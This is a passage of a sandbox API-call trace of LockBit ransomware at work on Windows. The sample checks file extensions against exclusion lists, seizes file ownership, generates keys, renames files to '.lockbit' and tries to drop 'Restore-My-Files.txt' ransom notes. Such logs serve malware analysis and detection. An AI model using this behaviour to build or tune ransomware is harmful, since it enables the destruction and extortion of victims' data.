(lpString1=".db-wal", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.345] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.346] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.346] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.346] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png.lockbit") returned 84 [0093.346] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.349] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.350] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.350] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.351] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.353] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.353] RtlFreeAnsiString (AnsiString="\\") [0093.353] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0093.353] malloc (_Size=0x200) returned 0x77d800 [0093.353] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.353] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.353] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.353] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.354] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.354] CloseHandle (hObject=0x1194) returned 1 [0093.354] free (_Block=0x77d800) [0093.355] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0093.355] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.355] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.355] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3057) returned 1 [0093.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.361] ReadFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.373] malloc (_Size=0xbe) returned 0x3e70008 [0093.373] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0093.374] free (_Block=0x3e70008) [0093.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.374] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.374] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.374] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x658e, dwReserved0=0x0, dwReserved1=0x0, cFileName="travel.png", cAlternateFileName="")) returned 1 [0093.374] lstrcmpiW (lpString1=".", lpString2="travel.png") returned -1 [0093.375] lstrcmpiW (lpString1="..", lpString2="travel.png") returned -1 [0093.375] PathFindExtensionW (pszPath="travel.png") returned=".png" [0093.375] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.375] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.375] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.376] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.376] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.377] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.377] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.377] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.377] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="ntldr", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="bootsect.bak", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="autorun.inf", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="thumbs.db", lpString2="travel.png") returned -1 [0093.377] lstrcmpiW (lpString1="iconcache.db", lpString2="travel.png") returned -1 [0093.377] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.377] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned=".png" [0093.377] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.377] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.378] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.378] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.378] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.378] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.378] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.379] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.379] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.379] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.379] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.379] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png.lockbit") returned 70 [0093.379] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.388] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.390] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.390] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.391] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.392] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.392] RtlFreeAnsiString (AnsiString="\\") [0093.392] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13d8) returned 0x0 [0093.393] malloc (_Size=0x200) returned 0x77d800 [0093.393] NtQueryInformationToken (in: TokenHandle=0x13d8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.393] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.393] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.393] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.394] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.394] CloseHandle (hObject=0x13d8) returned 1 [0093.394] free (_Block=0x77d800) [0093.394] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travel.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13d8 [0093.394] CreateIoCompletionPort (FileHandle=0x13d8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.394] malloc (_Size=0x40068) returned 0x3d70048 [0093.394] GetFileSizeEx (in: hFile=0x13d8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=25998) returned 1 [0093.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0093.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0093.400] ReadFile (in: hFile=0x13d8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0093.402] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.402] malloc (_Size=0xa2) returned 0x3e70008 [0093.402] NtSetInformationFile (FileHandle=0x13d8, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0093.403] free (_Block=0x3e70008) [0093.403] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.403] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.403] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.404] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7258522e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7258522e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x321a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain.wmv", cAlternateFileName="")) returned 1 [0093.404] lstrcmpiW (lpString1=".", lpString2="TravelIntroToMain.wmv") returned -1 [0093.404] lstrcmpiW (lpString1="..", lpString2="TravelIntroToMain.wmv") returned -1 [0093.404] PathFindExtensionW (pszPath="TravelIntroToMain.wmv") returned=".wmv" [0093.404] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.404] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.405] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.405] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="ntldr", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="bootsect.bak", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="autorun.inf", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="thumbs.db", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] lstrcmpiW (lpString1="iconcache.db", lpString2="TravelIntroToMain.wmv") returned -1 [0093.406] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.406] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned=".wmv" [0093.406] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.406] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.406] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.407] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.408] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.lockbit") returned 81 [0093.408] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, 